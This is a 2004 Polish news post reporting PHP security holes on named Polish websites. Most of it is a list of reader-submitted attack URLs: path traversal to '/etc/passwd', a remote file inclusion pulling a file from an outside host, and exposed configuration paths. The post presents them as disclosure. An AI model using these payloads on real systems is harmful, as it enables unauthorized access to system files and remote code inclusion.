Dziury w skryptach PHP

Bezpieczeństwo | Pt, 27 Luty 2004 21:35:38 +0100 | Autor: Redakcja | Czytań: 6989

Wielu z naszych czytelników, po opublikowaniu artykułu "Izba marnie zabezpieczona" - podesłało nam kilkanaście linków dających dość oryginalne wyniki, wśród nich m.in.:

http://imiennik.com.pl/index.php?plik=../../../etc/passwd
http://www.tester.com3.pl/index.php?plik=../../../../../etc/passwd
http://www.wirtualnypoznan.pl/inc
http://www.krakow.pl/.htaccess_o
http://www.krakow.pl/samorzad/fotoreportaz/?id=http://republika.pl/h0meless/a/test

W chwili publikowania powyższych adresów wszystkie z nich pokazywały faktycznie te informacje na które wskazywał ich URL.

Zobacz również:

  • passwd Portalu Księgarskiego

  • Izba marnie zabezpieczona


  • W tej chwili nie ma jeszcze komentarzy. Możesz jednak dodać swój własny.

    Aby dodawać komentarze musisz się zalogować.

    W dziale wiadomośći, każda zarejestrowana osoba ma możliwość dodawania swoich wiadomości. Pojawią się one w serwisie po akceptacji jednego z moderatorów. Aby zachęcić was do aktywnego udziału w rozwoju serwisu, przygotowaliśmy konkurs z nagrodami.

    Top 20 news
    Najaktywniejsi
    1 Rellik 9640 pkt.
    2 grzemach 870 pkt.
    3 betaKondor 470 pkt.
    4 Koras 350 pkt.
    5 Localghost 140 pkt.
    6 kris2005a 140 pkt.
    7 elmocamp 100 pkt.
    8 Tommy 100 pkt.
    9 Scoti 80 pkt.
    10 sevar 60 pkt.
    Zobacz pełną listę